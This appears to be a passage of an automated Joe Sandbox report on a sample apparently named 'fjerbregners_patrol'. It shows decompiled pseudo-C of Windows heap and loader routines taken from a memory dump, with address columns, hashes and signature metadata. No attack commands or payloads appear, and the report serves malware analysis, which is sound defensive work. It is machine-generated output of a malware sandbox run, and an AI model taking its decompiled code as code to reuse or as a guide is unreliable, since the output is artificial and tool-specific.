                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5f5f
                                                                                                                                                                                            0x33cf5ee2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5ee2
                                                                                                                                                                                            0x33cf5c04
                                                                                                                                                                                            0x33cf5c0a
                                                                                                                                                                                            0x33cf5c0b
                                                                                                                                                                                            0x33cf5c11
                                                                                                                                                                                            0x33cf5c1a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5c24
                                                                                                                                                                                            0x33cf6047
                                                                                                                                                                                            0x33cf604c
                                                                                                                                                                                            0x33cf604c
                                                                                                                                                                                            0x33cf5c2a
                                                                                                                                                                                            0x33cf5c30
                                                                                                                                                                                            0x33cf5c3a
                                                                                                                                                                                            0x33cf5c40
                                                                                                                                                                                            0x33cf5c4c
                                                                                                                                                                                            0x33cf5c52
                                                                                                                                                                                            0x33cf5c5f
                                                                                                                                                                                            0x33cf5c68
                                                                                                                                                                                            0x33cf5c71
                                                                                                                                                                                            0x33cf5c7a
                                                                                                                                                                                            0x33cf5c7d
                                                                                                                                                                                            0x33cf5c85
                                                                                                                                                                                            0x33cf5c9e
                                                                                                                                                                                            0x33cf5ca1
                                                                                                                                                                                            0x33cf5ca7
                                                                                                                                                                                            0x33cf5cad
                                                                                                                                                                                            0x33cf5cba
                                                                                                                                                                                            0x33d5087c
                                                                                                                                                                                            0x33cf5cc0
                                                                                                                                                                                            0x33cf5cc0
                                                                                                                                                                                            0x33cf5cc0
                                                                                                                                                                                            0x33cf5cc4
                                                                                                                                                                                            0x33d50886
                                                                                                                                                                                            0x33d50889
                                                                                                                                                                                            0x33d50889
                                                                                                                                                                                            0x33cf5cd1
                                                                                                                                                                                            0x33d50897
                                                                                                                                                                                            0x33d50897
                                                                                                                                                                                            0x33cf5cf0
                                                                                                                                                                                            0x33d508a2
                                                                                                                                                                                            0x33d508a2
                                                                                                                                                                                            0x33cf5cf6
                                                                                                                                                                                            0x33cf5cfc
                                                                                                                                                                                            0x33cf5d09
                                                                                                                                                                                            0x33d508ae
                                                                                                                                                                                            0x33d508ae
                                                                                                                                                                                            0x33cf5d0f
                                                                                                                                                                                            0x33cf5d15
                                                                                                                                                                                            0x33cf5d22
                                                                                                                                                                                            0x33d508ba
                                                                                                                                                                                            0x33d508ba
                                                                                                                                                                                            0x33cf5d22
                                                                                                                                                                                            0x33cf5d28
                                                                                                                                                                                            0x33cf5d2f
                                                                                                                                                                                            0x33cf5d37
                                                                                                                                                                                            0x33cf5d39
                                                                                                                                                                                            0x33cf5d40
                                                                                                                                                                                            0x33cf5d47
                                                                                                                                                                                            0x33cf5f41
                                                                                                                                                                                            0x33cf5f47
                                                                                                                                                                                            0x33cf5fc2
                                                                                                                                                                                            0x33cf5fc8
                                                                                                                                                                                            0x33cf5f49
                                                                                                                                                                                            0x33cf5f49
                                                                                                                                                                                            0x33cf5f49
                                                                                                                                                                                            0x33cf5d4d
                                                                                                                                                                                            0x33cf5d4d
                                                                                                                                                                                            0x33cf5d4d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5d47
                                                                                                                                                                                            0x33cf5be7
                                                                                                                                                                                            0x33cf5e7f
                                                                                                                                                                                            0x33cf5baf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5baf
                                                                                                                                                                                            0x33cf5ba1
                                                                                                                                                                                            0x33cf5a46
                                                                                                                                                                                            0x33cf5a4b
                                                                                                                                                                                            0x33cf5a52
                                                                                                                                                                                            0x33cf5a5f
                                                                                                                                                                                            0x33cf5a64
                                                                                                                                                                                            0x33cf5a6b
                                                                                                                                                                                            0x33cf5a71
                                                                                                                                                                                            0x33cf5a76
                                                                                                                                                                                            0x33d50772
                                                                                                                                                                                            0x33cf6068
                                                                                                                                                                                            0x33cf6073
                                                                                                                                                                                            0x33cf6073
                                                                                                                                                                                            0x33cf5a7c
                                                                                                                                                                                            0x33cf5a82
                                                                                                                                                                                            0x33cf5a88
                                                                                                                                                                                            0x33cf5a8e
                                                                                                                                                                                            0x33cf5a92
                                                                                                                                                                                            0x33cf5a95
                                                                                                                                                                                            0x33cf5a9c
                                                                                                                                                                                            0x33cf5aa3
                                                                                                                                                                                            0x33cf5ab6
                                                                                                                                                                                            0x33cf5abb
                                                                                                                                                                                            0x33cf5abe
                                                                                                                                                                                            0x33cf5ac5
                                                                                                                                                                                            0x33cf5ace
                                                                                                                                                                                            0x33cf5ad1
                                                                                                                                                                                            0x33cf5ad3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5ad3
                                                                                                                                                                                            0x33cf59fe
                                                                                                                                                                                            0x33cf5a01
                                                                                                                                                                                            0x33cf5a07
                                                                                                                                                                                            0x33cf5a08
                                                                                                                                                                                            0x33cf5a0d
                                                                                                                                                                                            0x33cf5a15
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5a1b
                                                                                                                                                                                            0x33cf5a1e
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                                                            • Opcode ID: 9ed731a02ab10dc722e9b2a0721f0c44e2637a3a849557e9455815e08c363233
                                                                                                                                                                                            • Instruction ID: 760dcff966a47c9016d0a49e86e751787d329a5a8cb9927b638ee5e0100045da
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ed731a02ab10dc722e9b2a0721f0c44e2637a3a849557e9455815e08c363233
                                                                                                                                                                                            • Instruction Fuzzy Hash: CF325374D003699FEB61CF64C984BD9BBB4BF08304F0441E9D549EB642DBB69A88CF91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                                                            			E33CEF5C7(void* __ecx, void* __edx) {
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				void* __ebx;
				intOrPtr _t63;
				void* _t66;
				signed int _t73;
				void* _t77;
				void* _t78;
				signed char* _t81;
				intOrPtr _t82;
				signed char* _t87;
				intOrPtr _t88;
				void* _t89;
				signed char* _t92;
				signed char _t98;
				void* _t110;
				void* _t130;
				void* _t136;
				signed int _t138;
				void* _t140;

				_t140 = (_t138 & 0xfffffff8) - 0x24;
				_t110 = __edx;
				_t136 = __ecx;
				E33CEF858(__edx,  &_v36,  &_v40);
				if(L33D268EA( *((intOrPtr*)(_t136 + 0x1f8)) -  *((intOrPtr*)(_t136 + 0x244)), _t136, _t136 + 0xd4) == 0) {
					_t128 = 0xc000012d;
					L17:
					_t63 =  *[fs:0x30];
					 *((intOrPtr*)(_t136 + 0x228)) =  *((intOrPtr*)(_t136 + 0x228)) + 1;
					__eflags =  *(_t63 + 0xc);
					if( *(_t63 + 0xc) == 0) {
						_push("HEAP: ");
						E33CEB910();
					} else {
						E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_v40);
					_push(_v36);
					_push(_t136);
					E33CEB910("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t128);
					_t66 = 0;
					L15:
					return _t66;
				}
				if(( *(_t136 + 0x40) & 0x00040000) != 0) {
					_t130 = 0x40;
					_push(0);
					_push(0x1c);
					_push(_t140 + 0x1c);
					_push(3);
					_push(_t136);
					_push(0xffffffff);
					_t73 = L33D32BE0();
					__eflags = _t73;
					if(_t73 < 0) {
						L22:
						E33DB5FED(0, _t136, "true",  *((intOrPtr*)(_t140 + 0x20)), 0, 0);
						goto L2;
					}
					__eflags =  *(_t140 + 0x18) & 0x00000060;
					if(( *(_t140 + 0x18) & 0x00000060) == 0) {
						goto L22;
					}
					__eflags =  *((intOrPtr*)(_t140 + 0x14)) - _t136;
					if( *((intOrPtr*)(_t140 + 0x14)) == _t136) {
						L3:
						_push(_t130);
						_push(0x1000);
						_push( &_v40);
						_push(0);
						_push( &_v36);
						_push(0xffffffff);
						_t77 = E33D32B10();
						_t128 = _t77;
						if(_t77 < 0) {
							goto L17;
						}
						_t78 = E33D03C40();
						_t131 = 0x7ffe0380;
						if(_t78 != 0) {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t81 = 0x7ffe0380;
						}
						if( *_t81 != 0) {
							_t82 =  *[fs:0x30];
							__eflags =  *(_t82 + 0x240) & 0x00000001;
							if(( *(_t82 + 0x240) & 0x00000001) != 0) {
								L33DAEFD3(_t110, _t136, _v36, _v40, 8);
							}
						}
						 *((intOrPtr*)(_t136 + 0x240)) =  *((intOrPtr*)(_t136 + 0x240)) - 1;
						 *((intOrPtr*)(_t136 + 0x244)) =  *((intOrPtr*)(_t136 + 0x244)) - _v40;
						if(E33D03C40() != 0) {
							_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t87 = _t131;
						}
						if( *_t87 != 0) {
							_t88 =  *[fs:0x30];
							__eflags =  *(_t88 + 0x240) & 0x00000001;
							if(( *(_t88 + 0x240) & 0x00000001) != 0) {
								__eflags = E33D03C40();
								if(__eflags != 0) {
									_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								E33DAF1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t131 & 0x000000ff);
							}
						}
						_t89 = E33D03C40();
						_t132 = 0x7ffe038a;
						if(_t89 != 0) {
							_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t92 = 0x7ffe038a;
						}
						if( *_t92 != 0) {
							__eflags = E33D03C40();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							}
							E33DAF1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t132 & 0x000000ff);
						}
						 *((intOrPtr*)(_t136 + 0x21c)) =  *((intOrPtr*)(_t136 + 0x21c)) + 1;
						_t98 =  *(_t110 + 2);
						if((_t98 & 0x00000004) != 0) {
							E33D48140(_v36, _v40, 0xfeeefeee);
							_t98 =  *(_t110 + 2);
						}
						 *(_t110 + 2) = _t98 & 0x00000017;
						_t66 = 1;
						goto L15;
					}
					goto L22;
				}
				L2:
				_t130 = 4;
				goto L3;
			}





























                                                                                                                                                                                            0x33cef5cf
                                                                                                                                                                                            0x33cef5d9
                                                                                                                                                                                            0x33cef5e0
                                                                                                                                                                                            0x33cef5e3
                                                                                                                                                                                            0x33cef607
                                                                                                                                                                                            0x33d4e162
                                                                                                                                                                                            0x33d4e167
                                                                                                                                                                                            0x33d4e167
                                                                                                                                                                                            0x33d4e16d
                                                                                                                                                                                            0x33d4e173
                                                                                                                                                                                            0x33d4e177
                                                                                                                                                                                            0x33d4e2dd
                                                                                                                                                                                            0x33d4e2e2
                                                                                                                                                                                            0x33d4e17d
                                                                                                                                                                                            0x33d4e192
                                                                                                                                                                                            0x33d4e197
                                                                                                                                                                                            0x33d4e2e8
                                                                                                                                                                                            0x33d4e2ec
                                                                                                                                                                                            0x33d4e2f0
                                                                                                                                                                                            0x33d4e2f7
                                                                                                                                                                                            0x33d4e2ff
                                                                                                                                                                                            0x33cef6ba
                                                                                                                                                                                            0x33cef6c0
                                                                                                                                                                                            0x33cef6c0
                                                                                                                                                                                            0x33cef614
                                                                                                                                                                                            0x33d4e19f
                                                                                                                                                                                            0x33d4e1a0
                                                                                                                                                                                            0x33d4e1a2
                                                                                                                                                                                            0x33d4e1a8
                                                                                                                                                                                            0x33d4e1a9
                                                                                                                                                                                            0x33d4e1ab
                                                                                                                                                                                            0x33d4e1ac
                                                                                                                                                                                            0x33d4e1ae
                                                                                                                                                                                            0x33d4e1b3
                                                                                                                                                                                            0x33d4e1b5
                                                                                                                                                                                            0x33d4e1c8
                                                                                                                                                                                            0x33d4e1d6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e1d6
                                                                                                                                                                                            0x33d4e1b7
                                                                                                                                                                                            0x33d4e1bc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e1be
                                                                                                                                                                                            0x33d4e1c2
                                                                                                                                                                                            0x33cef61d
                                                                                                                                                                                            0x33cef61d
                                                                                                                                                                                            0x33cef61e
                                                                                                                                                                                            0x33cef627
                                                                                                                                                                                            0x33cef628
                                                                                                                                                                                            0x33cef62e
                                                                                                                                                                                            0x33cef62f
                                                                                                                                                                                            0x33cef631
                                                                                                                                                                                            0x33cef636
                                                                                                                                                                                            0x33cef63a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef640
                                                                                                                                                                                            0x33cef645
                                                                                                                                                                                            0x33cef64c
                                                                                                                                                                                            0x33d4e1e9
                                                                                                                                                                                            0x33cef652
                                                                                                                                                                                            0x33cef652
                                                                                                                                                                                            0x33cef652
                                                                                                                                                                                            0x33cef657
                                                                                                                                                                                            0x33d4e1f3
                                                                                                                                                                                            0x33d4e1f9
                                                                                                                                                                                            0x33d4e200
                                                                                                                                                                                            0x33d4e212
                                                                                                                                                                                            0x33d4e212
                                                                                                                                                                                            0x33d4e200
                                                                                                                                                                                            0x33cef661
                                                                                                                                                                                            0x33cef667
                                                                                                                                                                                            0x33cef674
                                                                                                                                                                                            0x33d4e225
                                                                                                                                                                                            0x33cef67a
                                                                                                                                                                                            0x33cef67a
                                                                                                                                                                                            0x33cef67a
                                                                                                                                                                                            0x33cef67f
                                                                                                                                                                                            0x33d4e22f
                                                                                                                                                                                            0x33d4e235
                                                                                                                                                                                            0x33d4e23c
                                                                                                                                                                                            0x33d4e247
                                                                                                                                                                                            0x33d4e249
                                                                                                                                                                                            0x33d4e254
                                                                                                                                                                                            0x33d4e254
                                                                                                                                                                                            0x33d4e254
                                                                                                                                                                                            0x33d4e26f
                                                                                                                                                                                            0x33d4e26f
                                                                                                                                                                                            0x33d4e23c
                                                                                                                                                                                            0x33cef685
                                                                                                                                                                                            0x33cef68a
                                                                                                                                                                                            0x33cef691
                                                                                                                                                                                            0x33d4e282
                                                                                                                                                                                            0x33cef697
                                                                                                                                                                                            0x33cef697
                                                                                                                                                                                            0x33cef697
                                                                                                                                                                                            0x33cef69c
                                                                                                                                                                                            0x33d4e291
                                                                                                                                                                                            0x33d4e293
                                                                                                                                                                                            0x33d4e29e
                                                                                                                                                                                            0x33d4e29e
                                                                                                                                                                                            0x33d4e29e
                                                                                                                                                                                            0x33d4e2b9
                                                                                                                                                                                            0x33d4e2b9
                                                                                                                                                                                            0x33cef6a2
                                                                                                                                                                                            0x33cef6a8
                                                                                                                                                                                            0x33cef6ad
                                                                                                                                                                                            0x33d4e2d0
                                                                                                                                                                                            0x33d4e2d5
                                                                                                                                                                                            0x33d4e2d5
                                                                                                                                                                                            0x33cef6b5
                                                                                                                                                                                            0x33cef6b8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef6b8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e1c2
                                                                                                                                                                                            0x33cef61a
                                                                                                                                                                                            0x33cef61c
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                            • API String ID: 2994545307-2586055223
                                                                                                                                                                                            • Opcode ID: ad447862058b5494a5484a43d40586ade1ded783f74836c6a37192c876733447
                                                                                                                                                                                            • Instruction ID: 5885850a154aefb9b0f575c80c8be6a923aee966eff89b91070ebd38d553ad52
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad447862058b5494a5484a43d40586ade1ded783f74836c6a37192c876733447
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F61F476645780AFE311CB64C844F17B7ECFF84B94F090959F994CB6A1CA34E904CB61
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                            • API String ID: 2994545307-1391187441
                                                                                                                                                                                            • Opcode ID: f74c282af8054e976c3aeee3a9822333416b3007027004af25a882b3c3d00cb7
                                                                                                                                                                                            • Instruction ID: 63203c0ff2ebc7f7797844ac2501a3b7762be843d5f8bf24d304f2ee4f532344
                                                                                                                                                                                            • Opcode Fuzzy Hash: f74c282af8054e976c3aeee3a9822333416b3007027004af25a882b3c3d00cb7
                                                                                                                                                                                            • Instruction Fuzzy Hash: B431F33A901205EFDB01DB55CC84F9AB7B8EF45771F1540A1F894EB292DB75E940CE60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E33D7166E(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t19;
				void* _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t38;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;

				_t44 = __ecx;
				_t30 = 0;
				_v16 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x54)) +  *((intOrPtr*)( *[fs:0x30] + 8)) + 0xffffffd4;
				_t19 = E33D39EB0(_t42, "BoG_ *90.0&!!  Yy>", 0x13);
				_t48 = _t47 + 0xc;
				if(_t19 != 0 ||  *((intOrPtr*)(_t42 + 0x20)) > 3) {
					_t43 = 1;
					_v8 = 1;
					_t46 = _t44 + 0x18 + ( *(_t44 + 0x14) & 0x0000ffff);
					_v12 = _t30;
					if(0 <  *(_v16 + 6)) {
						while(1) {
							_t23 = E33D39EB0(_t46, "stxt371", 9);
							_t48 = _t48 + 0xc;
							if(_t23 == 0) {
								goto L12;
							}
							if(_t43 != 0) {
								_t29 = E33D39EB0(_t46, ".txt", 6);
								_t48 = _t48 + 0xc;
								_t43 = _t29;
							}
							_t26 = _v8;
							if(_t26 != 0) {
								_t26 = E33D39EB0(_t46, ".txt2", 7);
								_t48 = _t48 + 0xc;
								_v8 = _t26;
							}
							if(_t43 != 0 || _t26 != 0) {
								_t46 = _t46 + 0x28;
								_t38 = _v12 + 1;
								_v12 = _t38;
								if(_t38 < ( *(_v16 + 6) & 0x0000ffff)) {
									continue;
								} else {
								}
							} else {
								goto L12;
							}
							goto L13;
						}
						goto L12;
					}
				} else {
					L12:
					_t30 = 1;
					 *( *[fs:0x30] + 3) =  *( *[fs:0x30] + 3) | 0x00000008;
				}
				L13:
				return _t30;
			}


















                                                                                                                                                                                            0x33d7167e
                                                                                                                                                                                            0x33d71680
                                                                                                                                                                                            0x33d71689
                                                                                                                                                                                            0x33d71691
                                                                                                                                                                                            0x33d71699
                                                                                                                                                                                            0x33d716a0
                                                                                                                                                                                            0x33d716a6
                                                                                                                                                                                            0x33d716b2
                                                                                                                                                                                            0x33d716b7
                                                                                                                                                                                            0x33d716ba
                                                                                                                                                                                            0x33d716bc
                                                                                                                                                                                            0x33d716c8
                                                                                                                                                                                            0x33d716ca
                                                                                                                                                                                            0x33d716d2
                                                                                                                                                                                            0x33d716d7
                                                                                                                                                                                            0x33d716dc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d716e0
                                                                                                                                                                                            0x33d716ea
                                                                                                                                                                                            0x33d716ef
                                                                                                                                                                                            0x33d716f2
                                                                                                                                                                                            0x33d716f2
                                                                                                                                                                                            0x33d716f4
                                                                                                                                                                                            0x33d716f9
                                                                                                                                                                                            0x33d71703
                                                                                                                                                                                            0x33d71708
                                                                                                                                                                                            0x33d7170b
                                                                                                                                                                                            0x33d7170b
                                                                                                                                                                                            0x33d71710
                                                                                                                                                                                            0x33d71719
                                                                                                                                                                                            0x33d7171f
                                                                                                                                                                                            0x33d71720
                                                                                                                                                                                            0x33d71729
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d7172b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d71710
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d716ca
                                                                                                                                                                                            0x33d7172d
                                                                                                                                                                                            0x33d7172d
                                                                                                                                                                                            0x33d71733
                                                                                                                                                                                            0x33d71741
                                                                                                                                                                                            0x33d71741
                                                                                                                                                                                            0x33d71746
                                                                                                                                                                                            0x33d7174a

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                                                                                                            • API String ID: 0-1880532218
                                                                                                                                                                                            • Opcode ID: 85d65bdbdc7384c50db3de82fe354f0a6e28be168447abfd3ecd5ed9d79957e6
                                                                                                                                                                                            • Instruction ID: 4ecb85d9ae3962221210779637c919ff2e776f482b948c2fad78ae05a06e1643
                                                                                                                                                                                            • Opcode Fuzzy Hash: 85d65bdbdc7384c50db3de82fe354f0a6e28be168447abfd3ecd5ed9d79957e6
                                                                                                                                                                                            • Instruction Fuzzy Hash: B121337AE02210EBD7118F58D941BDEB3F9AF45B44F08416AE845A7742EA74D905C750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF7072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: 17bdeeef27123d5a1a64946e8bec0a50f21d4dc1a43d7a6b234b8586bb254575
                                                                                                                                                                                            • Instruction ID: 4e329ae3360a1c83dcb3e9541dc991f3b34c4b0b26665d5a8a248f7e3f03121c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 17bdeeef27123d5a1a64946e8bec0a50f21d4dc1a43d7a6b234b8586bb254575
                                                                                                                                                                                            • Instruction Fuzzy Hash: AE51E974A00706AFEF05DF64C884BAEBBB8BF04391F14812AF442D7690DB75D915CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D97ABE Relevance: 4.6, APIs: 3, Instructions: 85timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: 0e4f2994a012c7c7ed495e01865de9d8db9fd0089ebe5b1cade0b7db847c7902
                                                                                                                                                                                            • Instruction ID: 70c678afeba9311a1e35913f62a94921e4f63c1f3c553f56056d5f2f308703b7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e4f2994a012c7c7ed495e01865de9d8db9fd0089ebe5b1cade0b7db847c7902
                                                                                                                                                                                            • Instruction Fuzzy Hash: B23103B5E1021A8FEB06DFA9C884ADDFBF5BF48754F14812AE851B3250CB349941CB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D83608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                            • API String ID: 0-1168191160
                                                                                                                                                                                            • Opcode ID: 49685887f3ccb5da76d429ceafb6cf582e4f94483c39aa88db41044a8f232623
                                                                                                                                                                                            • Instruction ID: 014a77e46b8b2b8cc2c5249378459257a1bfda18add5a4284d43806f9d4f2812
                                                                                                                                                                                            • Opcode Fuzzy Hash: 49685887f3ccb5da76d429ceafb6cf582e4f94483c39aa88db41044a8f232623
